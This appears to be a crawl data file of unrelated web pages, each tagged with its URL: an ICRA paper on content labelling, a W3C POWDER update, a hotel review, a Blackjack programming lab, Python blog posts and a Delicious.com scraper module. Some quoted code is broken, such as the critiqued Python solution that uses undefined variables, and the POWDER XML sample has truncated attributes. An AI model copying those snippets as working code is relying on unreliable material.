Send feedback, corrections, et cetera to wyatt .DOT. lee .DOT. baldwin .AT. gmail .DOT. com or create an issue. | http://code.google.com/p/restler/ | crawl-002 | en | refinedweb |
Since 1999, ICRA has operated the internet's leading system of self-labelling for the purposes of child protection. Like its predecessor organisation, RSACi, and other online labelling systems, ICRA has used the PICS Recommendations to encode its labels.
ICRA acknowledges that take-up of labelling has been limited. Although several high profile websites carry ICRA's labels, few are "fully labelled" in terms that a PICS-based filter would understand. There are several reasons for this that were discussed in detail at a workshop at WWW2004.
Neither has ICRA labelling been used to its full potential, notably in content adaptation. This is unfortunate since the potential is significant. If a delivery system were aware that content of a particular type should not be offered, perhaps in the children's section of a website, then alternatives can be automatically identified and provided. In this way the user sees customised content and the provider keeps their audience.
In June this year, under the chairmanship of David Young of Verizon, ICRA established a working group to explore improved methods of labelling that would overcome both the technical problems associated with PICS and the logistical problems faced by large organisations who wish to label their content. By working on solutions to this problem, ICRA believes that while maintaining its focus on child protection it can make a real contribution to the wider issues of associating metadata with content.
Various methods of linking RDF to web resources, especially HTML documents, have been suggested. Simply embedding RDF in an (X)HTML document breaks the Doc Type and is not a satisfactory solution. Using namespace defined meta tags, as recommended by the Dublin Core initiative for example, has two key drawbacks:
The Recommendation is that descriptions should be held in discrete files and that resources should point to them. However, the assumption at the heart of RDF is that each resource has its own unique description. Content labelling for child protection and other purposes calls for the ability to associate a single label with an unlimited number of resources for which the same meta data applies. There are a lot of PG-13 films, but the Motion Picture Association of America only has one PG-13 rating.
ICRA contends that the ideal system for delivering labels of this type - ones that can be applied to multiple resources - will have a number of features that in addition to helping to empower parents to make choices about what their children do and don't see online would be directly applicable to content adaptation and other metadata applications. A single description should be able to cover all resources within a defined domain, subdomain, path etc. Furthermore, it should be possible to override a description applied at a domain level at document level.
The working group has made significant progress towards realising these desirable features but recognises that further work needs to be done. We have devised and tested two candidate solutions that complement each other.
In both candidate solutions, the description(s) are held in a separate file - an RDF/XML instance. A content provider might define, say, 3 or 4 descriptions that describe their material and these are encoded within that single file. From an ICRA point of view, these would declare the type of content present, but they could just as easily convey any metadata that applied to multiple resources. Such a file would be retrieved once by a client and processed internally rather than being fetched repeatedly for each request to the network. The two candidate solutions differ in the way in which the labels are linked to the content they describe.
In this scenario, content includes a pointer (in its header information) to one of the descriptions (or the single description) in the RDF file. Any number of resources can point to a given description and, for a given description, the pointer is identical. The content management system/webmaster retains the responsibility for including a pointer that links the content to the correct description.
In this scenario the descriptions include extra information about where they should be applied. Therefore a content provider can arrange for the same pointer to be included with all content, irrespective of the description it should have. Within the description there would be data that encodes rules such as 'everything on our domain should have description A except things with the word "chatroom" in them which should have description B.' The responsibility for labelling content correctly can then be passed to an individual or department who may themselves have no direct access to or control over the content, just the descriptions for it.
Basic demonstration-standard tools have been devised to generate these descriptions and to locate and parse them.
If a user declares that his/her device has particular properties, perhaps using CC/PP, or that they prefer a text only version of a site, they disclose simply how they can or prefer to receive the material offered. If, however, the user discloses that, for example, sexual material, gambling services or other content types are not wanted, they disclose information about themselves. This constitutes a loss of privacy that might be regarded as acceptable by many users if it improved the ratio of wanted to unwanted material received.
However, if the profile of the user indicated that he/she was probably a young child, would that increase or decrease their vulnerability on the web?
The possibility that it would actually make children more vulnerable, particularly to paedophile activity, currently prevents ICRA from advocating that filter settings should be disclosed when making requests to the web. If there is a way around this problem however, the potential of ICRA labelling for content adaptation becomes significantly greater.
ICRA and others are working on a system that allows metadata to be associated with multiple resources. This metadata, expressed in RDF/XML, offers the potential for uses that reach from content labelling for child-protection purposes, through to discovery metadata, copyright, trust marks etc. all of which can have direct bearing on content adaptation.
Phil Archer, CTO, ICRA
7th September 2004 | http://www.w3.org/2004/06/DI-MCA-WS/submissions/position-icra.html | crawl-002 | en | refinedweb |
POWDER Working Group has had three key meetings in the last 9 days.
A quick reminder - POWDER is designing a lightweight system that will enable RDF triples to be applied to groups of resources, typically all those available from a given Web site. Critically, the data will be open to authentication so that when Organization A says that Web site B has properties C, D and E, a machine will be able to seek authentication from Organization A that they really did say that. Think of it as the automated/Semantic Web version of 'Click to Verify' when you see a trustmark on a Web site.
On the first of these meetings we also agreed on a coordination step with the Web Application Formats Working Group relating to their Enabling Read Access document. We also made significant progress towards defining the details of the structure of a Description Resource (a more detailed summary of this meeting is also available).
We also had a public event, jointly sponsored by CTIA. This “Stakeholder Meeting” presented several use cases and discussed the potential—and potential problems—of the new protocol. A full report is available.
Finally, a meeting was held with the Mobile Web Best Practices Working Group to discuss mobileOK. This is a key use case for POWDER as it encodes a claim that a group of resources are conformant with Mobile Web Best Practice.
As a result of all these meetings, it’s possible to present a sample Description Resource. One or two minor details have yet to be finalized but this is a good snapshot.
1 <wdr:DR> 2 <foaf:hasMaker rdf: 3 <dcterms:issued>2007-07-17</dcterms:issued> 4 <wdr:validFrom>2007-07-21</wdr:validFrom> 5 <wdr:validUntil>2008-05-21</wdr:validUntil> 6 <wdr:hasScope> 7 <wdr:ResourceSet> 8 <wdr:includeHosts>example.org</wdr:includeHosts> 9 </wdr:ResourceSet> 10 </wdr:hasScope> 11 <wdr:hasDescriptors rdf: 12 <dc:description>example.org conforms to the mobileOK Basic standard, meaning that basic steps have been taken to provide a functional user experience for users of basic mobile devices</dc:description> 13 <foaf:depiction rdf: 14 </wdr:DR>
The namespace declarations are omitted for clarity but
wdr is an abbreviation represents the POWDER namespace (it's an abbreviation of Web Description Resources).
Some elements are mandatory:
foaf:maker)
wdr:hasScopeand the Resource Set it points to)
wdr:hasDescriptorswhich has a range of a Class called 'Descriptors')
All other elements are optional, however, an issue date and a valid until date SHOULD be there.
The most tricky and contentious aspect of all this is likely to be the Resource Set definition. As noted in a blog last week, the relevant document is now a first public working draft. The ambitious target is to get a working draft of the Description Resources document into the public domain around the end of the month. | http://www.w3.org/blog/SW/2007/07/19/powder_update | crawl-002 | en | refinedweb |
I had never been to the Algarve before (and never really fancied it much) but the chance of a cheap winter break, with sensible flight times coupled to the “rave reviews” of this hotel on trip adviser sold it to me. So off we went on 28th Feb 2008 till 6th March 2008. This is a good hotel – but I don’t think it is quite as good as the reviews led me to believe.
The. Very surprising that no previous reviewer had seen this as a problem –it would have changed my holiday plans for sure! On the plus side the work is due to finish in March on the Porto Bay but this will create another 500 ish rooms in the close vicinity of the hotel. The work on the Riu Club is due to finish in the “summer”. This will introduce another 500 ish rooms so the area will be a lot busier. Parking for our hire car (booked on arrival in the hotel with Hertz – 126Euro for 4 days) was at times tight during our holiday in part due to the building works. When these 2 hotels open it will be a nightmare!
We arrived at check in at 14.00 and were given a room straight away but we were warned on the coach that check in time is 16.00 and so in the high season you may have to wait for a room. Contrary to a previous reviewer we found that the room safe was not free but was 16 euros for a week. He must have been lucky and reception had forgotten to lock it.
The glass of cava at check in was a nice touch but we had to ask (quite forcibly) for the 18.00 dinner sitting. The receptionist was keen to slot us into the 20.00 sitting. We discovered later that the early sitting seems to be favoured by the German visitors and we got the distinct impression that they got preferential treatment in this respect at least. The Thomson Rep gave us check in forms to fill in on the coach which saved a bit of time as there were around 20 of us on the coach. There was normally only 1 receptionist on duty so queues did occur. On this occasion though a second member of staff appeared and helped out so there was little delay.
Our room was on the West side of the hotel and fairly large, very clean and comfortable. The aircon was switched off for the winter so if the room was too hot there was a ceiling fan which helped. The weather was kind to us so we had a week of temperatures in the low 20s almost every day and the sun in our room in the afternoon so it did get a bit warm at times. Outside the rooms on this side of the hotel in the garden was a bank of 12 large aircon fan units which were not all in use due to it being winter but beware in the summer as they will be very noisy! Across the valley there is a school on this side of the hotel so after 15.00 (till about 17.30) the children seemed to have sports outside. A quiet sit on the balcony was therefore impossible.
On our first night we turned up at 18.00 for dinner to be met by the whole group of kitchen and waiting staff lined up to greet us for dinner. This took place every night and was another nice friendly touch. As it was our first night we asked for a table and the head waiter allocated us to a table and instructed a waiter to show us to it. We had just sat down when another head waiter arrived to tell us we were at the wrong table and told us to move to another table. Having been shown there by the waiter and sat down again another guest arrived and told us that this was her table so we were shown to yet another table which we eventually kept for the rest of our stay. The food was good but not great which I would say of every buffet I have had. Help yourself to soup and/or salad then there was the possibility of waiter service for a choice of 2 main courses. The food served by the waiter was by and large the same as that on the show cooking so not a big deal really. The deserts were the usual buffet selection with lots of plastic cream. Many of the dishes tasted identical even if they were a different colour! They did lay on a hot desert every night which was unusual but it was the same/similar every night. A large scoop of ice cream, covered in a hot sauce containing fruit finished off with a generous measure of brandy!
The restaurant did have a school dining hall feel to it. The Germans started queuing up about 17.50 and rattled the door if it wasn’t open at 18.00 precisely. There was then a rush to the buffet and a bit of a scrum for the first 10 minutes. There was always a good choice on the buffet and a reasonable amount of variation. The dining room was a bit noisy and stuffy at times I think due to the lack of aircon at this time of year – opening the doors onto the terrace would have helped but I don’t think they wanted us outside either for dinner or breakfast.
Wine in the restaurant starts about 11euro a bottle but pay a bit more if possible. Beer is 2.20 euro and a small bottle of water is 1.90euro. These are added to your bill at check out but make sure you keep the receipts and check your bill. Mine was wrong and so were several other couples we spoke to! Tap water is not drinkable so you have to buy water but it is very cheap in the supermarkets –as is the wine and beer.
Breakfast (08.00 – 1030) was fine with plenty of choice and a glass (or 2?) of cava available. The bacon was the usual continental variety mostly fat. The croissants are to be avoided – one I had was more like nan bread! There were no problems with tables as you sit anywhere, but some mornings they seemed to be short staffed and there were a shortage of clean tables by 09.00.
Like most of the Algarve the village is now a long way from a little fishing village – hotels and apartments are taking over. There are 2 supermarkets and quite a few restaurants and bars. During our week most of the bars closed by 20.00 so we couldn’t go for a walk and drink after dinner.
We enjoyed our week and toured most of the sights but if I was to return (unlikely) I would go for the Sheraton hotel. It has a better location and is not surrounded by other large hotels – it will no doubt be more expensive however. | http://www.tripadvisor.com/ShowUserReviews-g189112-d572475-r14227796-Riu_Palace_Algarve-Albufeira_Algarve.html | crawl-002 | en | refinedweb |
In this lab, you will write a program which plays the card game of Blackjack.
The program will present a GUI interface which will allow an interactive
user to play a game of Blackjack against the computer, which will act as the
dealer.
In case you don't know the rules of BlackJack, it works like this. You start with a hand of 2 cards. The value of a hand is the sum of the values of its cards: 10 for face cards (Jacks, Queens and Kings), 1 or 11 for Aces, and the face value for the rest. You can ask for as many additional cards as you like, one at a time, and stop whenever you like. The goal is to bring the value of your hand as close to 21 as you can without exceeding 21. After you have taken as many cards as you like the dealer repeats this process with her own hand. The winner is the player who comes closest 21 without going over.
To implement the game, you'll write a group of classes to model important components of the game:
The dealer deals two cards to each player and to himself. (In our case,
we will just have one player, the interactive user.) The dealer shows
one of his cards face up, the other is kept face down.
Each player then has the opportunity to request additional cards from the dealer. The player has the choice of requesting a Hit; that is, an additional card, or to Stand; that is, to finish his turn and keeping his hand as it is.
Eventually, the player either busts or stands pat. A bust is an automatic loss. If the player stands without busting, the dealer then plays his hand. The dealer has the same choices (hit or stand) that the other players do. If the dealer busts, the player wins. Otherwise, the hand with the highest value wins. If the dealer's hand and the player's hand have the same value, the game is a "push" (a tie game), and the player's bet is returned. (Note: A hand with Blackjack beats a hand with 21, but not Blackjack.)
If you download the jar file and expand it, you will find the following files:
BlackJackInterface.java This is a GUI interface for the game; you do not need to change anything in this file.
BlackJack.java This plays a game of BlackJack using the rules above. You don't need to change anything in this file or to add to it, but since it refers to the classes you need to build you may want to see how it is using them. The main() method for the BlackJack program is in this class.
The BlackJack.java file makes references to three other classes: Card (a single playing card), Deck (a pack of 52 Cards), and Hannd (a list of Cards). Your job in this lab is to implement these three classes, according to the descriptions given below. Do not change the names of the methods, or your BlackJack class will not be able to find the methods it needs. When these three classes are fully implemented you should have a working BlackJack game. Meanwhile, I have made suggestions for including temporary main() methods in each of the classes as you build them to help debug them. These temporary main() methods should be deleted (or commented out) after you are confident that each class is functioning properly.
Write the following methods for Card:
1. Card(int suit, int rank); This is a constructor to initialize the suit and rank of a card.
2. int value(); This method returns the value of the Card in the game of BlackJack. (Ace=11, Two=2, ... , Ten=10, Jack=10, Queen=10, King=10). Don't worry for now that an Ace might be valued at 1 or 11; just use value 11 for Aces.
3. String toString(); This method should return a String representing the Card, in the form
Ace of Hearts
Three of Diamonds
King of Clubs
etc.
Suggestion: Set up static final arrays of the suit names and rank names. For example,
private static final String[] suits = { "Clubs", "Diamonds", "Hearts", "Spades" };
A suit name can then be obtained from the suits array by using the suit code as an index. Ranks can be handled in the same way.
4. main(String[] args); For testing only, write a main method which creates two or three cards and writes them to System.out using the toString method. Once you are sure this class is implemented correctly, remove this main() method.
Deck has the following methods:
1. Deck(); A constructor that initializes a deck of playing cards in order by suit and then rank. The constructor instantiates 52 cards and stores them in its array, starting with the ace of clubs, two of clubs, three of clubs, ... , king of clubs, ace of diamonds, two of diamonds, etc.
2. static Deck shuffledDeck(); Returns a new, randomized deck of cards. A random deck can be created by starting with a standard deck and then shuffling it. Here's one way to shuffle the deck: Pick any two cards at random, and then swap them in the deck. By itself, this won't shuffle the cards very much. So, repeat it, say 1000 times. The deck should be well shuffled by then. Here is a function that will help with this:
private static int randomIndex() {
return (int) (DECK_SIZE*Math.random());
}
where DECK_SIZE is a static final int with value 52. This returns a random index into the card array, with value between 0 and 51.
3. int sizeRemaining(); Returns a count of the number of cards which have not yet been dealt.
4. Card dealCard(); Return the next card from the top of the deck. This method can be used by any object that wants to deal from the deck. When a card is dealt, the index pointing to the top card should be advanced by one card.
5. static void main(String[] args); For testing purposes, write a main method which creates a shuffled deck and displays all 52 of its cards, one per line. Again, after this tests out correctly delete this main() method.
In the game of Blackjack, a player is dealt 2 cards initially. After
that, the player may request being "hit" with additional cards. The objective
is to obtain a hand whose value is as close as possible to 21, without going
over 21. (A hand with a value greater than 21 is a "bust", and automatically
loses the game.)
To model a Blackjack hand, you can use an array to store the cards held in the hand. You should also keep track of the number of cards in the hand. You may assume that a hand never has more than 20 cards. Then write the following methods:
1. Hand(Card card1, Card card2); This constructor initializes a Hand with two cards dealt from the dealer.
2. Card getCard(int i); Return the ith Card from the Hand.
3. void add(Card card); Add a Card to a Hand.
4. int value(); Compute the value of the Hand. The value of the Hand is the sum of the values of the cards in the Hand. Now we need to take into account the rule that Aces can be valued as 1 or 11. Suppose v is the sum of the values of the cards in the hand (counted Aces as 11) and n is the number of Aces. Let j be the smallest number <= n so that v-10*j is <= 21 (i.e., j is the number of Aces we will count as 1 rather than11). Then the value of the hand is v-10j;
5. boolean hasBlackJack(); A Hand has BlackJack if it contains an ace and a 10-point card; that is, it is a two-card hand with a value of 21.
6. boolean isBusted(); A Hand is busted if its value exceeds 21.
7. String toString(); Return a string describing the contents of the Hand. The String should consist of the String representation of each Card in the Hand, separated by newline characters. If the Hand has BlackJack, append the word "BlackJack" to the String. If the Hand is a bust, append the word "Bust" to the String. For example,
"Ten of Clubs\nFive of Clubs\nNine of Hearts\n\nBust", which would appear as
Ten of Clubs
Five of Clubs
Nine of Hearts
Bust
8. public static void main(String[] args); Write a main method (for testing purposes) which creates a random deck, deals a hand from it, and displays it. Again, you should delete this method after testing your implementation.
The jar file for this lab implements a graphical interface for the BlackJack game. It consists of two files:
BlackJackInterface implements a window-based interface, which looks like this:
The frame contains two text areas (JTextArea) and three buttons (JButton). The left text area is used to display the player's hand and its value. The right text area is for the Dealer's hand; during play, only one of the dealer's two cards is visible to the player.
During play, the Play button is disabled. The Hit and Stand buttons are enabled, allowing the user to choose an avenue of play.
At the end of a game, the GUI looks like this:
The left text area displays the player's hand; the right text area displays the Dealer's hand. The text areas also display the value of each hand. The outcome of the game (Win, Lose, or Push) is displayed in the player's text area.
The Play button is enabled when the program is started and when a game is completed, and allows the user to start a new game. The Hit and Stand buttons are disabled while the Play button is active, and Play is disabled during a game, when Hit and Stand are enabled..
File BlackJack.java makes use of the interface to play the game. Class BlackJack maintains the deck of cards and hands for the player and dealer. It contains callback procedures for the buttons. The callback for the Play button just initializes the two hands and displays them. The callback for the Hit button adds a card to the player's hand, checks to see if the player has exceeded 21, and updates the display. The callback for the Stand button repeatedly adds cards to the dealer's hand until it exceeds the player's hand or busts. At this point it determines the winner of the game and updates the display. Finally, it reactivates the Play button to see if the user wants to play another game. | http://www.cs.oberlin.edu/~tsg/cs150/labs/lab07.html | crawl-002 | en | refinedweb |
Why Python programmers should learn Python
I recently clicked upon Keith Braithwaite and Ivan Moore’s presentation, “Why Java Programmers Should Learn Python”. It starts off well with an expert discussion of three different axes of type systems, placing various programming languages in the resulting 3-space. It then poses a programming problem, the kind of problem which Python excels at:
Given the supplied library classes write some code in “quickSilver” to convert between word and decimal digits representations of positive integers less than 1001.
e.g. “five seven three” → 573
e.g. 672 → “six seven two”
The Java programmers attending the presentation don’t know it yet, but “quickSilver” turns out to be Python, or at least a subset of it sufficient to solve the problem, and the final slides of the presentation contain a model solution to this problem.
A “model” solution?
Here is that solution.
class WordsFromNumber: def __init__(self,number): self.representationOf = number def wordsOf(self): lsd = self.representationOf % 10 msds = self.representationOf / 10 if msds == 0: return self.wordFor(self.representationOf) else: return WordsFromNumber(msds).wordsOf() + " " + \ self.wordFor(lsd) def wordFor(self,numeral): return ["zero", "one", "two", "three", "four", "five", "six", "seven", "eight", "nine"][numeral] class NumberFromWords: def __init__(self,words): self.representation = words def number(self): words = split("\\s",self.representation) return self.unpack(words) def unpack(self,words): if len(words) == 1: return self.numberFor(words[0]) else: lswi = len(words) - 1 lswi = words[lswi] msws = words[0:lswi] return self.numberFor(lsw) + 10 * self.unpack(msw) def numberFor(self,word): return {"zero" : 0, "one" : 1, "two" : 2, "three" : 3, "four" : 4, "five" : 5, "six" : 6, "seven" : 7, "eight" : 8, "nine" : 9}[word]
I don’t know what point the presenters were trying to make. I wasn’t in their audience but if I were, this code wouldn’t go any way towards persuading me I should bother with Python. It’s got two classes where none is needed, it uses recursion when container operations would do, it’s longer than it needs to be, and (putting myself in a Java programmer’s shoes) are all those
selfs really needed?
In other words this, to me, looks like Java written in Python. I’ll assume this is the point the presenters are trying to make, but if they revise the presentation, I’d like to suggest extending it to add an alternative ending, which I think shows off Python’s advantages.
number_to_word = { '0' : 'zero', '1' : 'one', '2' : 'two', '3' : 'three', '4' : 'four', '5' : 'five', '6' : 'six', '7' : 'seven', '8': 'eight', '9' : 'nine' } word_to_number = { 'zero' : 0, 'one' : 1, 'two' : 2, 'three' : 3, 'four' : 4, 'five' : 5, 'six' : 6, 'seven' : 7, 'eight' : 8, 'nine' : 9 } def number_to_words(number): return ' '.join(number_to_word[c] for c in str(number)) def words_to_number(words): def dec_shift_add(x, y): return x * 10 + y return reduce(dec_shift_add, (word_to_number[w] for w in words.split()))
I’ve omitted documentation in order to squeeze the encode-decode functions on to a single slide. If I had time and space, though, I’d show how to document and test this function in one go using
doctest, taking care to cover what happens with invalid inputs.
By the way, you’ll see I’m using
reduce while I can! I think this example is one of those rare cases where it works well.
Dictionary initialisation
The explicit dictionaries are fine and good and almost certainly what should be presented to an audience of Python virgins, but in my own code I’d be tempted to remove a little replication. (My thanks to Ashwin for tactfully pointing out a howling bug in the code originally posted here).
import string words = "zero one two three four five six seven eight nine".split() number_to_word = dict(zip(string.digits, words)) word_to_number = dict(zip(words, range(10)))
Living by the Sword
A recent (2008-03-07) wave of hits from Reddit has prompted me to revisit this note and, cough, refactor my code. There’s no need for any mathematics, nested functions or
reduce: this problem is better handled by string conversions. And the goal of squeezing functions on a single slide is misguided. This code needs doctesting. Java programmers are used to good test frameworks with great tool support, but Python excels at this too.
from string import digits>> number_to_words(-1) Traceback (most recent call last): ... KeyError: '-' ''' return ' '.join(number_to_word[c] for c in str(number)) def words_to_number(words): '''Converts a string of digit names into an integer. Examples: >>> words_to_number('one two three') 123 >>> words_to_number('One tWo thrEE') 123 >>> words_to_number('zero one two') 12 >>> words_to_number('minus one') Traceback (most recent call last): ... KeyError: 'minus' >>> all(words_to_number(number_to_words(x)) == x for x in range(100)) True ''' return int(''.join(word_to_number[w] for w in words.lower().split())) if __name__ == "__main__": import doctest doctest.testmod()
Feedback
An alternative for words_to_number which may or may not be better:
... word_to_number = dict(zip(words, string.digits)) ... def words_to_number(words): int(''.join([word_to_number[x] for x in words.split()]))
Thanks SpComb, I think I do prefer your version. It's more symmetrical.
Hi Thomas, Thanks for your comments. I was a long time ago that we did that session, and we would probably do it differently today.
The goal really wasn't to show off any particular features of Python (despite the title)--we'd have preferred to use Smalltalk or Self anyway, but Python seemed to us the least threatening dynamic OO language at the time. The goal was only to fairly gently open some folk's eyes to what happens when you start to move away from the straightjacket of Java.
I dimly recall that we didn't want to "frighten the horses" too much, which would have been easy: for example, one attendee claimed quite strenuously that there was no advantage to a language having more abstract constructs in it for traversing a collection than the for-loop because for-loop code just flows out of your fingers so easily you hardly notice.
Keith | http://wordaligned.org/articles/why-python-programmers-should-learn-python | crawl-002 | en | refinedweb |
Del.icio.us Python API
From Michael G. Noll
One of my recent research tasks required me to retrieve various information from Delicious.com, a well-known social bookmarking service. My programming language of choice is Python, and so I wrote a basic Python module for getting the data I needed.
Figure 1: A tag cloud as seen on Delicious.com.
deliciousapi.py./<tag> and /tag/ most recent public bookmarks (up to 100) if you don't know the password
- get_tags_of_user(): returns a user's full tagging vocabulary, i.e. tags and tag counts, aggregated over all public bookmarks
- HTTP proxy support
Please note that DeliciousAPI can currently not scrape a user's full public bookmark collection if you don't know the user's password. This is because of technical restrictions on del.icio.us' side.
Here is a code snippet to demonstrate basic usage of deliciousapi.py:
import deliciousapi dapi = deliciousapi.DeliciousAPI() url = "" username = "jsmith" # web pages shown on the front page of Delicious.com aka the 'hotlist' featured_links = dapi.get_urls() # popular web pages tagged with "photography" popular_photography_links = dapi.get_urls(tag="photography") # web pages recently tagged with "web2.0", up to a maximum of # 300 URLs if possible; note that get_urls() cannot guarantee # that the list of URLs is free of duplicate items - this is # due to the way Delicious.com generates the regular feeds for # a given tag (i.e. /tag/<tag> as opposed to /popular/<tag>) recent_web20_links = dapi.get_urls(tag="web2.0", popular=False, max_urls=300) # DeliciousURL object, providing # .title : title of the web document as stored on delicious.com # .url : URL of the corresponding web document # .total_bookmarks: total number of bookmarks/users for this url # .bookmarks : list of (user, tags, comment, timestamp) tuples # .top_tags: list of (tag, tag_count) tuples, representing the # most popular tags of this url (up to 10) # .tags : dict mapping tags to total tag count # # # Note that by default, get_url() does only retrieve the # 50 most recent bookmarks of a given url. You can control # this behavior with the max_bookmarks parameter (see # docstrings). url_metadata = dapi.get_url(url) print url_metadata # output: [] 103 total bookmarks (= users), 187 tags (37 unique), 10 out of 10 max 'top' tags # print url_metadata.title # output: Del.icio.us Python API - Michael G. Noll print url_metadata.bookmarks # output: [ # (u'neetij', [u'python', u'api', u'del.icio.us', u'programming'], None, datetime.datetime(2008, 8, 4, 0, 0)), # (u'jsf.online', [u'software', u'programming', u'free', u'development', u'del.icio.us', u'python', u'2008'], u'Python API - wraps the del.icio.us api for python', datetime.datetime(2008, 8, 4, 0, 0)), # (u'as11018', [u'python', u'api', u'programming'], None, datetime.datetime(2008, 7, 30, 0, 0)), # ...] print url_metadata.top_tags # output: [ (u'python', 91), (u'api', 73), (u'del.icio.us', 71), ... ] print url_metadata.tags # output : { u'is:api': 1, u'code': 6, u'toread': 1, ... } # If get_user() is called with both username and password, the full # bookmark collection of the user is returned, including any private # bookmarks. Communication is encrypted via SSL. You can use get_user() # for creating a backup of your Delicious.com bookmarks. # # If get_user() is called without password, only the most recent # public bookmarks of the given user are returned (up to 100). # # DeliciousUser object, providing # .bookmarks : list of (url, tags, title, notes, timestamp) tuples # .tags : dict mapping tags to total tag count # .username : name of the corresponding del.icio.us user user_metadata = dapi.get_user(username) print user_metadata # output: [jsmith] 31 bookmarks, 78 tags (45 unique) print user_metadata.bookmarks # output: [ (u'', [u'mashup', u'tools', u'twitter'], u'Twellow.com :: Twitter users organized into business categories', u'Kind of yellow pages for Twitter, interesting.', datetime.datetime(2008, 6, 25, 0, 0, 0)), ... ] # list of (tag, tag_count) tuples user_tags = dapi.get_tags_of_user(username) print user_tags # output: { 'golf': 1, 'toread': 11, 'recipe': 1, 'rest': 4, ... }
deliciousmonitor.py
I have also written a Python script for monitoring Delicious.com bookmark RSS feeds. The default RSS feed is the "hotlist" of urls you see on the Delicious.com front page.
This script requires DeliciousAPI and demonstrates how it can be used. Basically, it mirrors the RSS feed and retrieves additional metadata such as an entry’s most popular tags from the Delicious.com service itself.
Here is an example output:
<document url="" users="103" top_tags="10"> <top_tag name="python" count="91" /> <top_tag name="api" count="73" /> <top_tag name="del.icio.us" count="71" /> <top_tag name="delicious" count="32" /> <top_tag name="programming" count="29" /> ... </document>
Download
You can now download and install DeliciousAPI from Python Cheese Shop (includes only deliciousapi.py) via setuptools/easy_install. Just run
- easy_install DeliciousAPI, or
- easy_install -U DeliciousAPI for updates
and after installation, a simple import deliciousapi in your Python scripts will do the trick.
An alternative is to download the code straight from my Subversion repository.
- deliciousapi.py
- deliciousmonitor.py (requires deliciousapi.py and Universal Feed Parser)
The code has been tested with Python 2.4.3 and 2.5.
License
The code is licensed to you under the GNU General Public License, version 2.
Feedback
Comments, questions and constructive feedback are always welcome. Just drop me a note. | http://www.michael-noll.com/wiki/Del.icio.us_Python_API | crawl-002 | en | refinedweb |
Essential Python Reading List
Contents
Here’s my essential Python reading list.
- The Zen of Python
- Python Tutorial
- Python Library Reference
- Python Reference Manual
- The Python Cookbook
- Code Like a Pythonista: Idiomatic Python
- Functional Programming HOWTO
- Itertools functions
- Python library source code
- What’s New?!
If this doesn’t ring true, Python isn’t for you.
Python Tutorial
Your next stop should be the Python tutorial. It’s prominently available at the top of the online documentation tree, with the encouraging prompt:
start here
The latest version (by which I mean the version corresponding to the most recent stable release of Python) can be found on the web at, but I recommend you find and bookmark the same page from your local Python installation: it will be available offline, pages will load fractionally quicker, and you’re sure to be reading about the version of Python you’re actually running. (Plus, as I’ll suggest later, it’s well worth becoming familiar with the contents of your Python installation).
And with this tutorial, you’ll be running code right from the start. No need to page through syntax definitions or battle with compiler errors.
Since the best way to learn a language is to use it, the tutorial invites you to play with the Python interpreter as you read.
If you have a programming background you can complete the tutorial in a morning and be using Python by the afternoon; and if you haven’t, Python makes an excellent first language.
A tutorial cannot cover everything, of course, and this one recognises that and points you towards further reading. The next place to look, it says, is the Python Library Reference. I agree.
Python Library Reference
The documentation index suggests you:
keep this under your pillow
It’s a reference. It documents use of the standard libraries which came with your Python installation. I’m not suggesting you read it from cover to cover but you do need to know where it is and what’s in it.
You should definitely read the opening sections which cover the built-in objects, functions and types. I also suggest you get used to accessing the same information from within the Python interpreter using
help: it may not be hyperlinked or prettily laid out, but the information is right where you need it.
>>> help(dict) Help on class dict in module __builtin__: class dict)
Python Reference Manual
The Language Reference claims to be:
for language lawyers
but I’m not sure that’s true. Readable and clear, it offers a great insight into the language’s design. Again, you may not want to read it straight through, but I suggest you skim read it now and return to it if you find yourself confused by Python’s inner workings.
The Python Cookbook
The Python Cookbook is the first slab of treeware I’m recommending. Yes, Active State provides a website for the book, which has even more recipes than the book and is well worth a visit, but I’d say you want the printed edition. It’s nicely laid out and provides clear examples of how to use Python for common programming tasks. Alternative approaches are discussed. You can dip in to it or read the sections most relevant to your particular domain. This book teaches you idiomatic Python by example and, remarkably, it actually benefits from being written by a large team of authors. The editors have done an excellent job.
Incidentally, if you’re wondering why I claim Python is a high-level language and C++ isn’t, just compare the contents of the Python Cookbook with the contents of its C++ counterpart. Both books weigh in at ~600 pages, but the C++ one barely gets beyond compiling a program and reading from a file.
Code Like a Pythonista: Idiomatic Python
This one’s a presentation David Goodger gave at a conference last year. I wish he’d written it and I’d read it sooner. If you care about code layout, how you name things etc. but don’t want to waste time arguing about such things, then you probably want to go with the native language conventions. Python has a well-defined style and this presentation describes it well, connecting and summarising the contents of several other references.
Functional Programming HOWTO
The next version of the Python documentation (for versions 2.6 and later) has a HOWTOs section. A. M. Kuchling’s Functional Programming HOWTO is a MUSTREAD, especially for anyone coming from a language with weak support for FP. Python is far from being a pure functional programming language but features like list comprehensions, iterators, generators, even decorators, draw direct inspiration from functional programming.
Itertools functions
If you took my advice and skim-read the Library Reference, you may have skipped past a small module (mis?)filed in the Numeric and Mathematical Modules section. Now’s the time to go back and study it. It won’t take long, but these itertools functions are, to me, the epitome of elegance and power. I use them every day, wish they were promoted to builtins, and most of my interpreted Python sessions start:
>>> from itertools import *
Python library source code
The pure-python modules and test code in your Python installation are packed with good, readable code. If you’re looking for example code using a particular module, have a look at that module’s unit tests.
What’s New?
I’ve mentioned Python versions a few times in this article. Although Python takes stability and backwards compatibility seriously, the language has updated every year for as long as I’ve been using it. Generally, the changes are backwards compatible so, for example, 2.1 code should work fine in 2.5, but it’s important to stay current.
Do you write code like this?
anag_dict = {} words_fp = open("wordlist.txt", "rt") for line in words_fp.readlines(): word = line.strip().lower() chars = [] for ch in word: chars.append(ch) chars.sort() key = "".join(chars) anag_dict.setdefault(key, []).append(word) words_fp.close() anagrams = [] for words in anag_dict.values(): if len(words) > 1: anagrams.append(words)
Then you should find out about list comprehensions, the built in
sorted function, and
defaultdicts — introduced in Python 2.0, 2.4, 2.5 respectively!
from collections import defaultdict anag_dict = defaultdict(list) with open("wordlist.txt", "rt") as words_fp: for line in words_fp: word = line.strip().lower() key = "".join(sorted(word)) anag_dict[key].append(word) anagrams = [words for words in anag_dict.itervalues() if len(words) > 1]
The
with statement, incidentally, appears in 2.6, which is in alpha as I write this. Get it now by:
from __future__ import with_statement
Anyway, the point of all this is that A. M. Kuchling writes up what’s new in each Python revision: think of it as the release notes. As an example, here’s What’s New in Python 2.5. Essential reading.
Other Books?
I’ve only mentioned one book on this reading list. There are plenty of other decent Python books but I don’t regard them as essential. In fact, I’d rather invest in an excellent general programming title than (for example) Programming Python.
